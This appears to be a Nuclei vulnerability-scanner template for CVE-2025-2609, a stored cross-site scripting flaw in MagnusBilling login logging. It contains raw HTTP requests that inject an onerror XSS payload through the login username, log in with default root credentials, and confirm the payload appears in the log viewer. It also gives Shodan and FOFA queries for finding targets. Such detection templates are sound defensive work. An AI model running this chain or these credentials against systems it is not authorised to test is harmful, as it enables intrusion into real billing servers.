Improper neutralization of input during web page generation vulnerability in MagnusSolution MagnusBilling login logging allows unauthenticated users to store HTML content in the viewable log component accessible at /mbilling/index.php/logUsers/read" cross-site scripting This vulnerability is associated with program files protected/components/MagnusLog.Php.This issue affects MagnusBilling- through 7.3.0.
PoC代码[已公开]
id: CVE-2025-2609
info:
name: MagnusBilling Login Logs - Cross-Site Scripting
author: DhiyaneshDK
severity: high
description: |
Improper neutralization of input during web page generation vulnerability in MagnusSolution MagnusBilling login logging allows unauthenticated users to store HTML content in the viewable log component accessible at /mbilling/index.php/logUsers/read" cross-site scripting This vulnerability is associated with program files protected/components/MagnusLog.Php.This issue affects MagnusBilling- through 7.3.0.
reference:
- https://vulncheck.com/advisories/magnusbilling-logs-xss
- https://chocapikk.com/posts/2025/magnusbilling/
- https://nvd.nist.gov/vuln/detail/CVE-2025-2609
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2025-2609
cwe-id: CWE-79
epss-score: 0.03969
epss-percentile: 0.87946
cpe: cpe:2.3:a:magnussolution:magnusbilling:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: magnussolution
product: magnusbilling
shodan-query: html:"MagnusBilling"
fofa-query: body="MagnusBilling"
tags: cve,cve2025,mbilling,stored,xss,authenticated,vkev
flow: http(1) && http(2) && http(3) && http(4)
variables:
username: "root"
password: "9F4CA770B638615AC5C3E0D2DA16B77C80C2F2C6" # magnus
http:
- raw:
- |
POST /mbilling/index.php/authentication/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user=<img src=x onerror=alert(document.domain)>&password=random
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "combination is invalid")'
- '!contains(body, "Trying SQL inject")'
condition: and
internal: true
- raw:
- |
POST /mbilling/index.php/authentication/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;
user={{username}}&password={{password}}&key=
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "success")'
condition: and
internal: true
- raw:
- |
GET /mbilling/index.php/authentication/check?_dc= HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "id_agent")'
condition: and
internal: true
- raw:
- |
GET /mbilling/index.php/logUsers/read?_dc=&page=1&start=0&limit=25 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "User: <img src=x onerror=alert(document.domain)>")'
condition: and
# digest: 4a0a00473045022100f219fa01285b5744129e1c2f04a2e73c371d8b92a917626a87222bfe5b956ffa02206ef4510dd0e536682c5395e40be66000922e355cee0863b8c67c0e0215ffed6a:922c64590222798bb761d5b6d8e72950